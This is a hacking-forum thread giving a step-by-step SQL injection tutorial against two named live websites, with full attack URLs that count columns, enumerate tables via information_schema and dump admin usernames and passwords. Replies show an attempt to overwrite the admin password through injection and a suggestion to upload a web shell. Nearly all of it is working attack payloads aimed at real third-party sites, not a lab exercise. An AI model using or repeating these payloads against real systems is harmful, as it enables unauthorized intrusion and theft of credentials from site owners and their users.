[TUT] SQL Injection with Demo on popular scripts

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    [TUT] SQL Injection with Demo on popular scripts

    Power of '

    i am sawing demo on mymp3singer.com and samwep.com

    Code:
    www.mymp3singer.com/artist.php?id=77'
    something changed in page this means site is vulnerable

    Now Finding No of Columns
    will use order by to do it


    Code:
    http://www.mymp3singer.com/artist.php?id=77 order by 1 --
    same page [-- are comments]

    Code:
    http://www.mymp3singer.com/artist.php?id=77 order by 2--
    same page
    increase untill u get changes in page or error

    i got at


    Code:
    http://www.mymp3singer.com/artist.php?id=77 order by 3--
    so we have 3 columns




    Code:
    http://www.mymp3singer.com/artist.php?id=77 union all select 1,2,3--
    it should show number of that column on page
    if not then add - before 77

    Code:
    http://www.mymp3singer.com/artist.php?id=-77 union all select 1,2,3--
    we can grab data from 3rd column

    now getting table and column names


    Code:
    http://www.mymp3singer.com/artist.php?id=-77 union all select 1,2,group_concat(table_name) from information_schema.tables--
    got table called 'admin'
    for columns replace table with columns
    now to get password


    Code:
    http://www.mymp3singer.com/artist.php?id=-77 union all select 1,2,password from admin--

    you cn try same methode in any script it wil give u gain access

    for samwep.com
    Code:
    http://www.samwep.com/categorylist/-18%20union%20all%20select%201,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin--/main/Wallpapers/default/1.html
    Passwords are encrypted you have to Decode them

    If you paid much bucks to get script it doesnt mean its 100% secure



    To Admin of those sites
    Please secure your scripts before sumone steals your data and scripts
    Last edited by StRiNg_MaStEr; 01.09.11, 05:28.

    #2
    i tried
    Code:
    http://www.mymp3singer.com/artist.php?id=-77%20union%20all%20update%20admin%20set%20password=MD5(atef)--
    but its not working.. Lol

    Comment


      #3
      Originally posted by atef View Post
      i tried
      Code:
      http://www.mymp3singer.com/artist.php?id=-77%20union%20all%20update%20admin%20set%20password=MD5(atef)--
      but its not working.. Lol

      Comment


        #4
        lol its not md5

        to hack in upload shell with loadfile

        Comment

        Working...
        X